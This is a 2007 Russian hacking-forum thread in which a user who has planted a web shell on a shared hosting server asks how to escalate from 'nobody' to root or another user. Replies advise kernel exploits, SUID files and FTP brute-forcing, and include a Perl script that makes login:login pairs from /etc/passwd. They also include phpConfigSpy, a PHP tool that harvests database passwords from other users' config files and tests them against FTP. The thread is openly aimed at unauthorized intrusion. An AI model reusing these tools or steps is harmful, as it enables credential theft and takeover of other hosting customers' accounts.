Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
nobody >> root возможно ли |
05.04.2007, 19:08
|
|
Познающий
Регистрация: 11.03.2007
Сообщений: 57
Провел на форуме:
89195
Репутация:
1
|
|
nobody >> root возможно ли
Привет
залил шелл
id показывает нободи
php инфо показывает
System Linux xxx.xxxxxxxxxx.xxx 2.6.9-42.0.3.ELsmp #1 SMP Fri Oct 6 06:21:39 CDT 2006 i686
Build Date Mar 8 2007 20:58:43
Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
mysql Client API version 4.1.21
запарковано много доменов - штук 100 юзверов
как поднять привелегии
спанель вроде обновляется каждый день - не может же быть что сплойты с милворма работали - а как дальше копать ума не приложу
подскажите план действий пожалуйста
цель - поиметь рута или юзера
disable_classes no value no value
disable_functions no value no value
safe_mode Off
Последний раз редактировалось undewaternemo; 05.04.2007 в 19:10..
|
|
|
05.04.2007, 19:12
|
|
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
Провел на форуме:
2976185
Репутация:
694
|
|
Посмотри сплоиты под ядро, под сервисы... Еще как вариант через суйдные файлы... но я в жтом не особо спец...( Погугли на темы которые я привел...
|
|
|
|
05.04.2007, 22:34
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 60
Провел на форуме:
320906
Репутация:
63
|
|
скорее всего это какой хостинг, ты проверь по ип ))
лучше не соваться в такой сервак.
|
|
|
|
05.04.2007, 23:41
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
2Stefun хекеры не чего не бояться!
Проверь поиском на файлы типа password/ посмотри открыт /etc/passwd если да, то пробуй брутить FTP login:login , ищи пасы к БД, возможны эти пасы подойдут к другому сервису.
|
|
|
|
06.04.2007, 03:08
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
посмотри открыт /etc/passwd если да, то пробуй брутить FTP login:login
вот тебе парсер:
PHP код:
#!/usr/bin/perl
open(IN,"pwd.txt");
open(OUT,">pwds.txt");
while(<IN>) {
chomp;
if (~/sh$/) { ## Запишем только валидные аккаунты
($u,@undef)=split ":";
print OUT "$u:$u\n"; ## В виде пары login:login
}
}
close(IN);
close(OUT);
ищи пасы к БД, возможны эти пасы подойдут к другому сервису.
.conf
.config
сonf.php
config.php
Последний раз редактировалось KPOT_f!nd; 06.04.2007 в 03:18..
|
|
|
|
06.04.2007, 09:50
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
Раз уж на то пошло, вот мой скрипт для нахождения в системе конфигурационных файлов, вытягивания оттуда пары логин:пароль и пробе подключения к ftp.
скрипт несложный, разберешься.
необходимо изменить всего 2 строчки:
$dirz = "/home/$username/public_html/";
и
$path = "/home/$user/public_html/";
- полный путь до директорий с сайтами.
PHP код:
<?php
/*
phpConfigSpy v0.2
coded by p-range #645552
(c) http://p-range.info
*/
echo '<html><head><title>phpConfigSpy v0.2</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n[+] Done\n";
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath = "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr = $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php'))
{
$pass = get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link)
{
@$config = fopen($link,'r');
while(!feof($config))
{
$line = fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass = str_replace("]=\"","",$pass);
}
else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass = str_replace("]='","",$pass);
return $pass[2];
}
}
}
function ftp_check($login,$pass)
{
@$ftp = ftp_connect('127.0.0.1');
if ($ftp)
{
@$res = ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass." Success !\n";
}
else ftp_quit($ftp);
}
}
echo '</textarea><br><br>Coded by <b>$re@m3r</b> & <b>p-range</b> <a href=http://p-range.info>p-range.info</a></body></html>';
?>
Последний раз редактировалось p-range; 21.05.2007 в 10:55..
|
|
|
|
06.04.2007, 15:48
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
Если проблемы с сплойтами, заюзай шелл nfm, там есть компилёные, или читай тут
http://forum.antichat.ru/thread26510.html
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
про socks5
|
banall |
*nix |
9 |
11.10.2006 10:17 |
|
Помогите откомпилить!!
|
LoFFi |
Уязвимости |
19 |
19.03.2006 22:56 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
